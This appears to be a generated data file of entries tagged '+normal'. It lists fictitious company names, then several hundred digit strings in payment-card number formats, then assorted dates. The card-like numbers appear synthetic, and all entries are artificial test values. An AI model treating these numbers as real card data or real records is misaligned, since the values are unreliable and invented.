+normal,'Powell-Spencer' +normal,'Hardin, Miller and Sharp' +normal,'Allen, Lawrence and Barajas' +normal,'Hughes, Morton and Vazquez' +normal,'Blair and Sons' +normal,'Davis Inc' +normal,'Fletcher-Chen' +normal,'Wallace Group' +normal,'Pierce, Jefferson and Johnson' +normal,'Smith-Levine' +normal,'Simpson LLC' +normal,'Lee-Yang' +normal,'Ward Group' +normal,'Martin-Powell' +normal,'Patterson-Wright' +normal,'Bruce-Hicks' +normal,'Brown-Davis' +normal,'Young PLC' +normal,'Peterson Group' +normal,'Wallace, Lane and Ward' +normal,'Franklin-Myers' +normal,'Brown LLC' +normal,'Walter-Harper' +normal,'Santos, Hernandez and Schmitt' +normal,'Gray, White and Thompson' +normal,'Olson and Sons' +normal,'Baldwin-Morris' +normal,'Ford, Barron and Fischer' +normal,'Long LLC' +normal,'Copeland Inc' +normal,'Jackson and Sons' +normal,'Johnson Inc' +normal,'Reeves, Miller and Davidson' +normal,'Thompson and Sons' +normal,'Bass Inc' +normal,'Russell-Ortiz' +normal,'Warren Ltd' +normal,'Kramer Group' +normal,'Wilson-Rodriguez' +normal,'Harrison and Sons' +normal,'Burke-Gibson' +normal,'Durham, Weber and Nguyen' +normal,'Thomas and Sons' +normal,'Vargas Ltd' +normal,'Alvarado, White and Mcintosh' +normal,'Lopez, Ramirez and Mcbride' +normal,'Daniels-Miranda' +normal,'Harris-Walker' +normal,'Jones Ltd' +normal,'Bryant, Cook and Spencer' +normal,'Morrison LLC' +normal,'Smith-Williams' +normal,'Stone-Cardenas' +normal,'Oliver Ltd' +normal,'Sanchez, Torres and Jensen' +normal,'Larsen Ltd' +normal,'Wilson Inc' +normal,'Hughes, Parker and Garcia' +normal,'Velazquez-Wagner' +normal,'Green LLC' +normal,'Cooke, Johnson and Stone' +normal,'Gardner Group' +normal,'Martinez LLC' +normal,'Morgan-Banks' +normal,'Smith-Cole' +normal,'Tucker-Garcia' +normal,'Blevins-Roberts' +normal,'Fitzpatrick LLC' +normal,'Shaw and Sons' +normal,'Nunez Group' +normal,'Pham-Esparza' +normal,'Barrett-Smith' +normal,'Thomas-Estrada' +normal,'Clayton Ltd' +normal,'Figueroa-Barr' +normal,'Park and Sons' +normal,'Williams, Anderson and Werner' +normal,'James LLC' +normal,'Gutierrez LLC' +normal,'Osborne, Watson and Glenn' +normal,'Collins Ltd' +normal,'Hansen, Orr and Kelly' +normal,'Frazier-Shepard' +normal,'Medina-Harrington' +normal,'Lopez Inc' +normal,'Bailey, Hubbard and Lee' +normal,'Griffith-Smith' +normal,'Villanueva, Garcia and Torres' +normal,'Jensen PLC' +normal,'Gonzales, Smith and Larson' +normal,'Brown, Bradford and Valdez' +normal,'Wall LLC' +normal,'Petersen, Hunter and Allen' +normal,'Lee, Carroll and Baldwin' +normal,'Anthony-Hale' +normal,'Chen and Sons' +normal,'Guzman, Smith and Soto' +normal,'Quinn Inc' +normal,'Pearson, Washington and Gibson' +normal,'Gallagher LLC' +normal,'Hall, Perez and Sanders' +normal,'Dean, Ayala and Martinez' +normal,'Coleman LLC' +normal,'Little, Harvey and Solomon' +normal,'Taylor and Sons' +normal,'Coffey-Warren' +normal,'Carr Ltd' +normal,'Brown Ltd' +normal,'Cannon and Sons' +normal,'Hernandez PLC' +normal,'Morrison PLC' +normal,'Scott, Davis and Wolf' +normal,'Paul Group' +normal,'Norris LLC' +normal,'Hahn PLC' +normal,'Allen-Smith' +normal,'Jackson-Dixon' +normal,'Mccarthy PLC' +normal,'Kent Ltd' +normal,'Hicks, Nguyen and Evans' +normal,'Anderson Inc' +normal,'Kelly, Barron and Davidson' +normal,'Pope-Bruce' +normal,'Buchanan and Sons' +normal,'Austin LLC' +normal,'Gomez, Burton and Dixon' +normal,'Baldwin Group' +normal,'Meadows-Bray' +normal,'Sanders-Robinson' +normal,'Lawrence Ltd' +normal,'Tyler-Burke' +normal,'Hatfield Inc' +normal,'Thomas-Davis' +normal,'Reynolds-Cooper' +normal,'Bernard, Reid and Park' +normal,'Powell, Ellis and Pratt' +normal,'Miller Ltd' +normal,'Thompson, Adkins and Baldwin' +normal,'Moore, Gray and Harvey' +normal,'Hart-Burns' +normal,'Hughes-Miller' +normal,'Cook-Powell' +normal,'Ryan-Williams' +normal,'Hayes Group' +normal,'Williams, Lewis and Delgado' +normal,'Peterson-Griffin' +normal,'Norton and Sons' +normal,'Green, Martinez and Hall' +normal,'Ramos LLC' +normal,'Robinson and Sons' +normal,'Lee Group' +normal,'Scott Group' +normal,'Parker-Martin' +normal,'Martin LLC' +normal,'Cross-Hoffman' +normal,'Roberts-Morgan' +normal,'Clark-Johnson' +normal,'Aguilar-Jordan' +normal,'Watson, Conner and Padilla' +normal,'Steele Ltd' +normal,'Jacobson-Perkins' +normal,'Holland-Reed' +normal,'Dixon, Jones and Daugherty' +normal,'Schultz-Martinez' +normal,'Williamson, Davidson and Gardner' +normal,'Garcia, Thompson and Vincent' +normal,'Davis-Richardson' +normal,'Baldwin PLC' +normal,'Ortiz LLC' +normal,'Alexander, Kelly and Davis' +normal,'Rogers, White and Brandt' +normal,'Hopkins LLC' +normal,'Cooley Group' +normal,'Davenport, Meyers and Lopez' +normal,'Bradford LLC' +normal,'Wilson-Clements' +normal,'Bonilla, Bell and Carroll' +normal,'Lambert, Lewis and Thomas' +normal,'Lopez-Scott' +normal,'Brandt LLC' +normal,'Travis, Thomas and Hernandez' +normal,'Johnson-Adkins' +normal,'Walker, Kelly and Nichols' +normal,'Rodriguez, Bell and Bell' +normal,'Daniels, Day and Perry' +normal,'Johnson, Lewis and Hanson' +normal,'Owens-Holland' +normal,'Davis-Smith' +normal,'Lopez, Huffman and Wallace' +normal,'Morris-Anderson' +normal,'Dennis Inc' +normal,'Taylor-Hall' +normal,'Carter, Sexton and Sharp' +normal,'Turner Inc' +normal,'Mcdonald, Mcgee and Brown' +normal,'Romero-Brown' +normal,'White LLC' +normal,'Zamora-Young' +normal,'Daniels-Clark' +normal,'Olson-Walker' +normal,'Stewart Inc' +normal,'Gonzalez, Jackson and Moore' +normal,'Wood LLC' +normal,'Suarez Ltd' +normal,'Barron, Murray and Strickland' +normal,'Hanna Ltd' +normal,'Preston-Horton' +normal,'Jackson, Garrett and Schwartz' +normal,'Webster-Lyons' +normal,'Mckinney-Hughes' +normal,'Wilson-Austin' +normal,'Jimenez-Orozco' +normal,'Burgess, Reeves and Salinas' +normal,'Chavez PLC' +normal,'Weber, Harvey and Adams' +normal,'Weaver Group' +normal,'Evans-Davis' +normal,'Contreras LLC' +normal,'Reese LLC' +normal,'Carlson-Williams' +normal,'Summers Inc' +normal,'Whitney and Sons' +normal,'Ortiz PLC' +normal,'Webb-Ward' +normal,'Kelly-Carney' +normal,'Johnson LLC' +normal,'Ruiz LLC' +normal,'Willis Ltd' +normal,'Zimmerman, Davis and Lowe' +normal,'Jones-Brown' +normal,'Williams, Smith and Padilla' +normal,'Jackson, Wolfe and Hernandez' +normal,'Johnson, Evans and Erickson' +normal,'Fuentes LLC' +normal,'Anderson, Williams and Berry' +normal,'Williams-Wheeler' +normal,'Ramos-Wilson' +normal,'James, Randall and Steele' +normal,'Morgan, Smith and Mendoza' +normal,'Bartlett, Phillips and Cox' +normal,'Dixon-Owens' +normal,'Reyes Inc' +normal,'Blevins Inc' +normal,'Callahan-Powers' +normal,'Rodriguez Inc' +normal,'Perez and Sons' +normal,'Evans, Mckee and Jensen' +normal,'Morris-Grant' +normal,'Larsen Ltd' +normal,'Flores, Hughes and Gonzalez' +normal,'Horton PLC' +normal,'Kim, Friedman and Hernandez' +normal,'Owens, Cox and Padilla' +normal,'Bell, Terry and Cisneros' +normal,'Roman and Sons' +normal,'Meyer, White and Long' +normal,'Kent-Williams' +normal,'Oconnor Ltd' +normal,'Garza LLC' +normal,'Reed and Sons' +normal,'Harvey, Byrd and Baker' +normal,'Gordon Ltd' +normal,'Wu and Sons' +normal,'Wright, Ross and Glenn' +normal,'Martinez-Villarreal' +normal,'Weaver Group' +normal,'Taylor, Romero and Hunt' +normal,'Lewis Ltd' +normal,'Francis, Lewis and Anderson' +normal,'Jones Inc' +normal,'Preston Ltd' +normal,'Smith-Lewis' +normal,'Hardy-Price' +normal,'Mitchell-Salazar' +normal,'Smith-Pope' +normal,'Blackburn, Miller and Simmons' +normal,'Garcia, Campbell and Anderson' +normal,'Gonzalez PLC' +normal,'Smith, Blevins and Jones' +normal,'Hanson Group' +normal,'Ball-Merritt' +normal,'Watson-Jones' +normal,'Gonzalez Inc' +normal,'Lara Ltd' +normal,'Williams and Sons' +normal,'Meza, Howard and Frank' +normal,'Lopez-Bush' +normal,'Smith Inc' +normal,'Kane, Garcia and Patterson' +normal,'Ferguson PLC' +normal,'Hernandez PLC' +normal,'Morris-Ritter' +normal,'Perez, Hernandez and Graham' +normal,'Kennedy Inc' +normal,'Webb, Figueroa and Rosario' +normal,'Baker, Hamilton and Thomas' +normal,'Fisher, Moody and Kelley' +normal,'Porter, Gomez and Ford' +normal,'Webster-Smith' +normal,'Wilson Group' +normal,'Miller PLC' +normal,'Wilkerson, Barnett and Miller' +normal,'Lambert and Sons' +normal,'Clayton-Hill' +normal,'Torres-Austin' +normal,'Bailey-Zimmerman' +normal,'Cook-Wilson' +normal,'Roberts-Williams' +normal,'Leach-Black' +normal,'Nelson-Holland' +normal,'Barber, Roy and Smith' +normal,'Brown LLC' +normal,'Heath, Johnson and Noble' +normal,'Jones-Peterson' +normal,'Cannon, Todd and Gardner' +normal,'Reed, Harvey and Jimenez' +normal,'Mclean, Carter and Miller' +normal,'Scott-Crane' +normal,'Choi, Johnson and Marshall' +normal,'Rojas-Sanders' +normal,'Green Inc' +normal,'Norton Inc' +normal,'Hodges, Obrien and Carlson' +normal,'Anderson-Kennedy' +normal,'Smith-Sawyer' +normal,'Larson-Lang' +normal,'Jones-Orozco' +normal,'Garcia LLC' +normal,'Diaz, Mathis and Gill' +normal,'Flores-Yoder' +normal,'Sparks-Wilson' +normal,'Moore Inc' +normal,'Morgan, Rodriguez and Aguilar' +normal,'Walker LLC' +normal,'Garcia-Osborn' +normal,'Velasquez LLC' +normal,'Cabrera, Pena and Archer' +normal,'Perkins, Tran and Gonzalez' +normal,'Austin, Sandoval and Drake' +normal,'Young PLC' +normal,'Mitchell and Sons' +normal,'Wolf, Mccarthy and Davila' +normal,'Wright LLC' +normal,'Steele-Phillips' +normal,'Williams LLC' +normal,'Mcfarland-Russell' +normal,'Shannon-Patterson' +normal,'Gilmore Ltd' +normal,'Dunn-Wagner' +normal,'Hill and Sons' +normal,'Bowers PLC' +normal,'Green, King and Reyes' +normal,'Quinn-Johnson' +normal,'Frazier, King and Blevins' +normal,'Green-Richards' +normal,'Cabrera-Lewis' +normal,'Bond, Gross and Simmons' +normal,'Reed-Clarke' +normal,'Smith Ltd' +normal,'Coleman-Jenkins' +normal,'Warren-Williams' +normal,'Pacheco, Marshall and Jones' +normal,'Vargas Ltd' +normal,'Salazar, Reyes and Nichols' +normal,'Lowery, Aguilar and Clark' +normal,'Robbins, Carter and Yoder' +normal,'Salazar-Thomas' +normal,'Bailey, Hancock and Coffey' +normal,'Anderson, Cobb and Boone' +normal,'Sherman, Lawson and Ramirez' +normal,'Young-Harris' +normal,'Baxter Group' +normal,'Kim, Harrison and Curtis' +normal,'Vargas LLC' +normal,'Johnson-Lopez' +normal,'Hunter, Hughes and Mills' +normal,'Haynes-Scott' +normal,'White PLC' +normal,'Hawkins, Peters and Mendoza' +normal,'Harris, Lee and Hawkins' +normal,'Nguyen Group' +normal,'Taylor Group' +normal,'West-Gonzalez' +normal,'Fitzpatrick, Warren and Walker' +normal,'Flores-Walter' +normal,'Ramirez-Pham' +normal,'Davenport-Downs' +normal,'Alvarez-Marshall' +normal,'Kennedy Ltd' +normal,'Hall-Miller' +normal,'Ramos LLC' +normal,'Jones, Flores and Stephens' +normal,'Russell Inc' +normal,'Wilson, Mack and Wells' +normal,'Salas, Melendez and Berg' +normal,'Murray and Sons' +normal,'Crawford Inc' +normal,'Ford-Cunningham' +normal,'Rodriguez PLC' +normal,'Gallagher, Diaz and Wagner' +normal,'Riley-Pena' +normal,'Logan, Torres and Frost' +normal,'Rubio, Lane and Rangel' +normal,'Nunez LLC' +normal,'Ellis LLC' +normal,'Brooks, Decker and Dyer' +normal,'Finley-Ibarra' +normal,'Swanson, Martinez and Pittman' +normal,'Doyle Ltd' +normal,'Porter, Sharp and Odom' +normal,'Brown Ltd' +normal,'Porter-Burnett' +normal,'Ross-Arroyo' +normal,'Brown-Smith' +normal,'Hodges-Bean' +normal,'Mcguire, Summers and Smith' +normal,'Smith-Schmitt' +normal,'Frye Inc' +normal,'Freeman, Kim and Simon' +normal,'Wagner LLC' +normal,'3573535366296164' +normal,'3591202798751450' +normal,'6011504505276613' +normal,'213148720752260' +normal,'2277235071323194' +normal,'3593048926658978' +normal,'30500970760271' +normal,'3549222555858192' +normal,'30587085773802' +normal,'4785328799848' +normal,'342163627215208' +normal,'4995722750563999' +normal,'3529424173466879' +normal,'180048860908566' +normal,'4099140533379978' +normal,'4599548371717055579' +normal,'4207095128143' +normal,'6584069854797251' +normal,'4590318535650984' +normal,'30045497138585' +normal,'213117109354295' +normal,'3571985364002555' +normal,'30259035278130' +normal,'675914612782' +normal,'3557378835094609' +normal,'4136863103028023' +normal,'4668514631875474463' +normal,'4711776068350486228' +normal,'2700454907382715' +normal,'4052139605768659' +normal,'4861500135810810622' +normal,'060487888038' +normal,'213108339305330' +normal,'6595515250677049' +normal,'3503233139408119' +normal,'213157294548442' +normal,'4392435322045226' +normal,'4284062388274982875' +normal,'4570695640501850425' +normal,'2712691522348805' +normal,'5377624346972459' +normal,'5243040679008328' +normal,'375262710739288' +normal,'4935972606441907' +normal,'4656466266926668' +normal,'30388270244232' +normal,'4827304591425' +normal,'4967901277765238' +normal,'676121582909' +normal,'4935610531758892' +normal,'639022724020' +normal,'4468947498673523' +normal,'4307473260139317' +normal,'180059785413749' +normal,'180059956314908' +normal,'676309735626' +normal,'342846144510065' +normal,'4815250059315356' +normal,'4891351968204512' +normal,'676212957606' +normal,'4751766788392362' +normal,'4590451848290010430' +normal,'30226087418500' +normal,'2700463241502409' +normal,'3575687765483972' +normal,'6544538524656427' +normal,'2278748639660039' +normal,'6554436546645865' +normal,'30449347917224' +normal,'4984625665952087' +normal,'3544444703090495' +normal,'4361468426533' +normal,'4815569333548536' +normal,'2297398668350164' +normal,'6011742631287779' +normal,'4018228042998' +normal,'213171544657531' +normal,'376996495212768' +normal,'5502632806044931' +normal,'180036861761191' +normal,'180096922163647' +normal,'180072625217063' +normal,'3544743727522189' +normal,'180019190490054' +normal,'4500017776228976' +normal,'30344783809185' +normal,'4678815559625110' +normal,'344779381452824' +normal,'3546302053675687' +normal,'4321099467780298' +normal,'3568491597171205' +normal,'3529820081336379' +normal,'6011131019066809' +normal,'4871652687385' +normal,'4214542662443' +normal,'639085081532' +normal,'639011234999' +normal,'3547553145450088' +normal,'3537744157053009' +normal,'375545249221558' +normal,'2298274125564706' +normal,'4657273064505465' +normal,'4526887902607867' +normal,'3533767355316435' +normal,'4392518906037683' +normal,'573152604266' +normal,'4948398861648124' +normal,'30107440094040' +normal,'630461234712' +normal,'3527179919593988' +normal,'4865846365525718' +normal,'348406226317360' +normal,'180050793693463' +normal,'378072939419357' +normal,'180019606215905' +normal,'180069750619147' +normal,'6011946424777686' +normal,'4556708895580148' +normal,'4642646733201095' +normal,'30097141370965' +normal,'4362883729114434067' +normal,'180046566273657' +normal,'6011176571706755' +normal,'3591190752327948' +normal,'3501762701110861' +normal,'340311649427267' +normal,'180033611294169' +normal,'4372810600595335791' +normal,'4444436229590148' +normal,'347884162569387' +normal,'371901968274670' +normal,'4552517078892947' +normal,'4726436154747118' +normal,'6011478794613465' +normal,'3562316401049840' +normal,'6555073319210293' +normal,'4919437789958' +normal,'4559065508092144398' +normal,'3539302926127543' +normal,'6549835863371898' +normal,'4973809240850189' +normal,'5127596395640752' +normal,'377504675454819' +normal,'3569668393598330' +normal,'6011347388355603' +normal,'676375916654' +normal,'3502226890554114' +normal,'3540896619145156' +normal,'36386262644405' +normal,'3530626631304735' +normal,'2712850940140232' +normal,'343513904226196' +normal,'180060332856612' +normal,'4086540617404818646' +normal,'30512140546977' +normal,'570741198990' +normal,'4668002727253' +normal,'2334235567802793' +normal,'213142762430067' +normal,'4576278397109620294' +normal,'4083076076083239' +normal,'347450820588803' +normal,'2720150065356030' +normal,'30525775725997' +normal,'3587277830060272' +normal,'3557025555778305' +normal,'676198761139' +normal,'4341555629521942' +normal,'4234301360971' +normal,'3539180838683625' +normal,'4378790128864396' +normal,'180074654068334' +normal,'2696220620491554' +normal,'4032574420260' +normal,'3523169951225387' +normal,'4205732198632984611' +normal,'30132551467371' +normal,'4521190328519' +normal,'4044976083167834' +normal,'4620470627606' +normal,'676109315447' +normal,'6558557755789171' +normal,'30309157656512' +normal,'580423455212' +normal,'213148358069169' +normal,'4822321334809108' +normal,'30419207501624' +normal,'4875616690559' +normal,'372944097452501' +normal,'4006207070263287' +normal,'6557724088136238' +normal,'4556662602223' +normal,'2248194302616817' +normal,'375418959484826' +normal,'676277790561' +normal,'6530037264930825' +normal,'180031856657454' +normal,'3517815184937697' +normal,'4528108915048' +normal,'4711030602950171' +normal,'676328075582' +normal,'345755280311419' +normal,'3565349732683125' +normal,'676324312484' +normal,'30584579556181' +normal,'4544160065192046' +normal,'2271220149470637' +normal,'4119933536173' +normal,'4651064127128122' +normal,'503884438451' +normal,'374192217465718' +normal,'4101633377174683' +normal,'6539299493355734' +normal,'4331043084946278' +normal,'5401341490313881' +normal,'676315872389' +normal,'4927759677734379843' +normal,'6533723099905846' +normal,'2279112155532875' +normal,'4214360040680' +normal,'30406040872262' +normal,'4993453008755599' +normal,'3594671357928625' +normal,'4444457656516' +normal,'2720808623568418' +normal,'30099764172967' +normal,'5103234955262787' +normal,'180058906972096' +normal,'6011189059979729' +normal,'3576018144325610' +normal,'4302044443002626' +normal,'589224095796' +normal,'4464488468182231' +normal,'2298247349663140' +normal,'30119335755981' +normal,'3530708043756601' +normal,'3554371835567578' +normal,'4029646850143313' +normal,'676196550500' +normal,'569409491812' +normal,'4665781948177812436' +normal,'6538718908749273' +normal,'349925356128353' +normal,'378818282793586' +normal,'4368205206557913' +normal,'3540044770502101' +normal,'30076987865197' +normal,'3545756277267236' +normal,'213140970134877' +normal,'4869563143287847892' +normal,'180078078645544' +normal,'6556410800327914' +normal,'30213833280806' +normal,'340791291447533' +normal,'4421647705327543' +normal,'4426166431601688' +normal,'4629366549199535' +normal,'4129249909618' +normal,'4679449642331152' +normal,'30105910156125' +normal,'501820133400' +normal,'4854486917343' +normal,'3563204379730030' +normal,'374044204048876' +normal,'6011635349182524' +normal,'6011847380306975' +normal,'676163592329' +normal,'2720947554292232' +normal,'4719356309537603' +normal,'3570427468781645' +normal,'6575575829555195' +normal,'4222743997533325051' +normal,'3593440257822671' +normal,'213198688404495' +normal,'4751253977344488' +normal,'213138131563950' +normal,'2229202618909074' +normal,'6011281535779920' +normal,'213140432009139' +normal,'180093885883832' +normal,'4835806393332309236' +normal,'3566576211870240' +normal,'4282611872192039' +normal,'4410802815421079367' +normal,'3578592294790375' +normal,'38026114960835' +normal,'503843404263' +normal,'3521525775096522' +normal,'213105400381240' +normal,'378786768937680' +normal,'180088783857789' +normal,'30311853950231' +normal,'2704613980068444' +normal,'38276882042395' +normal,'38807138473123' +normal,'676157699213' +normal,'30312948116218' +normal,'4269936759017703' +normal,'36671813053002' +normal,'4799737724911346' +normal,'4920140539857972' +normal,'3529165027091336' +normal,'3576594847108768' +normal,'180091717610043' +normal,'370188804569932' +normal,'6592650486926267' +normal,'4858180041538424493' +normal,'675981373219' +normal,'676229610248' +normal,'676228418841' +normal,'676205866038' +normal,'4288164207859181' +normal,'4756149124785533004' +normal,'6569182578738706' +normal,'4878211112151666727' +normal,'3526425127961652' +normal,'213120110638771' +normal,'3512017288299414' +normal,'3518733548133839' +normal,'371108531286088' +normal,'30010395454328' +normal,'503895449364' +normal,'2287651676574106' +normal,'4562594250658493' +normal,'30222161244961' +normal,'213182462961680' +normal,'3571191732182290' +normal,'502033720439' +normal,'30556048773381' +normal,'30002167484252' +normal,'30517528257360' +normal,'4069676205379832362' +normal,'30009046015686' +normal,'4050258758523256694' +normal,'2289030636454535' +normal,'4679151346910485' +normal,'30267452681496' +normal,'341715636863665' +normal,'4753146380537881170' +normal,'4471293545526223' +normal,'180082242451847' +normal,'2268512465273701' +normal,'4574511533184' +normal,'3594340165179256' +normal,'3545073437743910' +normal,'3540829290930323' +normal,'4499960114550814773' +normal,'4905727958471126' +normal,'4732004510764490' +normal,'4418745420067002790' +normal,'4266679214245088' +normal,'4347364466628678' +normal,'5165069871813932' +normal,'4662693879091052714' +normal,'3544358596164961' +normal,'3500096923841933' +normal,'349605447489457' +normal,'4481292647459687' +normal,'4313043470449938148' +normal,'4265744042408935' +normal,'577533262660' +normal,'4783360331721129' +normal,'675969396885' +normal,'3596360635280565' +normal,'676392669773' +normal,'374248900798656' +normal,'3517894690326729' +normal,'3564294382258060' +normal,'3527926612509871' +normal,'4556607785869' +normal,'4921329469761242' +normal,'4445795022853766' +normal,'3536353876928078' +normal,'346121545849082' +normal,'4473997183871588' +normal,'2255007858527966' +normal,'4910512143389869' +normal,'639058874251' +normal,'4378504594991' +normal,'36996161126377' +normal,'3597541653748786' +normal,'4891421518471' +normal,'4416147794359151772' +normal,'3525392632119252' +normal,'676171010512' +normal,'213198366001720' +normal,'341862681202231' +normal,'180024521917437' +normal,'4297701176713587770' +normal,'4221190584921351' +normal,'4191568471329836' +normal,'676146339764' +normal,'180037250343856' +normal,'630417230376' +normal,'213139743529769' +normal,'3529749305294868' +normal,'4305657475300589' +normal,'4315519428672627663' +normal,'370021460786724' +normal,'2248616426578614' +normal,'4560546891194124' +normal,'340859353339706' +normal,'501866366013' +normal,'2357525892808644' +normal,'4767337643564223' +normal,'3529542189732529' +normal,'3598499821330608' +normal,'4041438996519232' +normal,'4538233028425692' +normal,'3590144851902581' +normal,'180003336428764' +normal,'4933642142416' +normal,'6516443882829001' +normal,'3513343432576385' +normal,'4478563653959' +normal,'4213139419543476' +normal,'4201144601021491' +normal,'4004900952082526' +normal,'4046665210034' +normal,'38726018885711' +normal,'4499918245446092720' +normal,'4250115982015967241' +normal,'180044030253355' +normal,'345187584682230' +normal,'3555478263335680' +normal,'342052246915803' +normal,'213120150750833' +normal,'4824670940992551' +normal,'180097782615791' +normal,'38143626615607' +normal,'2720653779106161' +normal,'4920272844676' +normal,'4545701016577477' +normal,'3569667086863712' +normal,'4250470783507776382' +normal,'4378843169000' +normal,'4285476204725' +normal,'639064446904' +normal,'3595527155603167' +normal,'6011792516527401' +normal,'3587052476456781' +normal,'348833266868848' +normal,'639001697858' +normal,'4823078899805884' +normal,'4439828316774' +normal,'4294448972651598' +normal,'180024712282583' +normal,'38469899628021' +normal,'180043076395765' +normal,'4863295810983837' +normal,'30010211675411' +normal,'6593733460150267' +normal,'4739675690127250992' +normal,'6011406402329125' +normal,'4598479579632' +normal,'4421284209131' +normal,'2720843939355515' +normal,'4044214408416409' +normal,'2435784196935449' +normal,'6566746748256766' +normal,'2234358229571191' +normal,'4221499150311406630' +normal,'376941170241419' +normal,'3515152826335698' +normal,'4451022995781291' +normal,'2242235816822247' +normal,'347324905084212' +normal,'30282123426866' +normal,'4259465540758992821' +normal,'347780503633397' +normal,'180076375465087' +normal,'3561334703965358' +normal,'345506233629302' +normal,'6526545372395406' +normal,'6011584800487321' +normal,'3576122179513981' +normal,'4844138132225981771' +normal,'2396472369528582' +normal,'30599152071853' +normal,'4569781919826297' +normal,'502037899817' +normal,'4163193720793015' +normal,'38466899477987' +normal,'3584993550855054' +normal,'4781855184009476440' +normal,'4267822704084158' +normal,'30526735672808' +normal,'4383692033388888' +normal,'36055639300708' +normal,'676295146994' +normal,'4612438660957758' +normal,'345526803098191' +normal,'3574283028685560' +normal,'6530756125804560' +normal,'5192999480469584' +normal,'4248582985100586' +normal,'30409517442536' +normal,'6011284127943722' +normal,'4587350049833968006' +normal,'3594309539486010' +normal,'38590070656042' +normal,'4077226042723115' +normal,'4018062395925699156' +normal,'4757268055734008' +normal,'3508264521147283' +normal,'4997999193603297' +normal,'4627106182567' +normal,'4949835185811671' +normal,'4341779086022547' +normal,'3588453322490405' +normal,'5200340848038557' +normal,'3590288038765948' +normal,'562748589859' +normal,'2290995037033020' +normal,'4483697449951' +normal,'379479177863593' +normal,'2293255081419832' +normal,'3501037863268686' +normal,'3549635173814190' +normal,'213175347752266' +normal,'4336036839591725' +normal,'345352960296845' +normal,'36856422385131' +normal,'344906325694910' +normal,'30281600217509' +normal,'4238744426679' +normal,'180087173828533' +normal,'180027208640859' +normal,'6519589098135398' +normal,'4802408204704' +normal,'30454787016537' +normal,'38277510322878' +normal,'2528089200695221' +normal,'5125470544388352' +normal,'6597734298299710' +normal,'3545245969716569' +normal,'30135427378128' +normal,'4769287192675193' +normal,'3575422643762995' +normal,'4181237090038416' +normal,'344890435888598' +normal,'4487777324007266323' +normal,'4293838535875376873' +normal,'4928229298714866368' +normal,'4618335131582' +normal,'3556754389337159' +normal,'213189415771942' +normal,'6011421961579283' +normal,'6525511327511670' +normal,'213106896228994' +normal,'6591951698390867' +normal,'4598674728649148' +normal,'4446054639406751' +normal,'4655135284955' +normal,'587444587279' +normal,'4767034485446143789' +normal,'4457730096304680' +normal,'3560869553660832' +normal,'6588578472672197' +normal,'4782994850260' +normal,'4526523592428680510' +normal,'3521880011518528' +normal,'30310867804475' +normal,'4578113685409' +normal,'370621294848994' +normal,'4650046707571780' +normal,'4847221607977148' +normal,'213164341769815' +normal,'6011986513807135' +normal,'4642028167329994859' +normal,'6011379293758621' +normal,'4418182437400' +normal,'371906101012101' +normal,'38625601722697' +normal,'4605285075674927' +normal,'4815622504109783122' +normal,'3512033662932488' +normal,'213112334012875' +normal,'4839826178582065713' +normal,'3565026109638300' +normal,'4445532878161717' +normal,'370052693063193' +normal,'3505453363138988' +normal,'3506389972891667' +normal,'180090332513558' +normal,'4727260622335580' +normal,'180033983676811' +normal,'180086005805339' +normal,'3591757818013215' +normal,'4752974771739643302' +normal,'4471809736631005791' +normal,'2720985303527953' +normal,'4419375709396066' +normal,'213174431901251' +normal,'2251323611863034' +normal,'378408718010571' +normal,'6579139208873582' +normal,'30546361582626' +normal,'3524233934372564' +normal,'4323921440287' +normal,'2001-05-27' +normal,'1991-12-04' +normal,'1952-06-16' +normal,'1944-06-30' +normal,'2008-12-01' +normal,'1927-05-12' +normal,'1942-09-04' +normal,'1924-02-17' +normal,'1911-01-28' +normal,'1909-05-26' +normal,'1950-10-10' +normal,'1993-12-03' +normal,'1993-06-06' +normal,'1935-04-05' +normal,'1924-06-12' +normal,'2009-01-02' +normal,'1942-09-18' +normal,'1957-02-27' +normal,'2015-06-22' +normal,'1930-02-18' +normal,'2008-03-09' +normal,'1949-03-14' +normal,'1951-04-05' +normal,'1940-01-21' +normal,'1943-08-30' +normal,'1993-08-07' +normal,'1960-11-20' +normal,'2010-11-16' +normal,'1970-05-14' +normal,'2001-08-08' +normal,'1971-06-30' +normal,'1998-12-06' +normal,'1984-12-08' +normal,'1993-09-03' +normal,'1925-10-27' +normal,'1992-11-13' +normal,'1968-10-20' +normal,'1963-03-16' +normal,'1930-09-07' +normal,'1950-09-06' +normal,'1927-01-16' +normal,'1910-10-30' +normal,'1910-05-03' +normal,'1958-12-24' +normal,'1986-10-04' +normal,'1988-12-25' +normal,'1958-02-08' +normal,'1959-12-15' +normal,'1928-03-10' +normal,'1980-12-27' +normal,'1985-06-16' +normal,'1910-05-02' +normal,'1986-08-09' +normal,'1910-10-23' +normal,'1915-10-29' +normal,'1951-01-19' +normal,'1974-07-15' +normal,'1991-03-09' +normal,'1960-06-21' +normal,'2022-04-25' +normal,'1986-09-17' +normal,'1911-04-15' +normal,'1972-03-16' +normal,'1953-04-24' +normal,'1949-09-21' +normal,'1969-05-27' +normal,'1991-01-20' +normal,'1996-04-23' +normal,'1918-07-04' +normal,'1938-10-24' +normal,'1913-07-13' +normal,'1990-11-07' +normal,'1981-01-02' +normal,'1981-09-28' +normal,'1922-11-23' +normal,'1947-11-13' +normal,'1977-04-06' +normal,'1995-04-30' +normal,'2015-01-15' +normal,'2015-12-09' +normal,'1950-09-11' +normal,'1984-07-11' +normal,'1952-02-06' +normal,'2006-07-05' +normal,'1955-06-07' +normal,'1973-09-25' +normal,'1936-10-22' +normal,'1953-08-20' +normal,'1929-05-02' +normal,'1918-04-19' +normal,'1909-08-17' +normal,'1940-01-18' +normal,'2021-05-07' +normal,'1931-01-25' +normal,'1965-05-08' +normal,'1988-04-20' +normal,'1927-11-09' +normal,'1929-09-04' +normal,'2008-05-29' +normal,'1975-10-11' +normal,'2016-10-23' +normal,'1938-02-10' +normal,'1958-07-07' +normal,'1999-08-16' +normal,'1944-04-20' +normal,'1946-07-28' +normal,'2005-03-23' +normal,'2001-06-13' +normal,'1911-08-30' +normal,'2021-11-03' +normal,'1922-11-28' +normal,'1993-06-19' +normal,'1984-12-08' +normal,'1956-08-27' +normal,'1952-01-06' +normal,'1980-03-11' +normal,'1942-05-31' +normal,'1983-11-18' +normal,'2002-02-22' +normal,'1913-08-18' +normal,'1930-08-21' +normal,'1996-05-27' +normal,'1969-08-11' +normal,'1982-06-23' +normal,'1945-12-03' +normal,'1921-07-09' +normal,'2007-03-11' +normal,'1976-09-01' +normal,'2001-07-25' +normal,'1926-01-31' +normal,'2018-09-02' +normal,'1935-03-21' +normal,'2017-08-28' +normal,'2015-12-24' +normal,'1952-06-13' 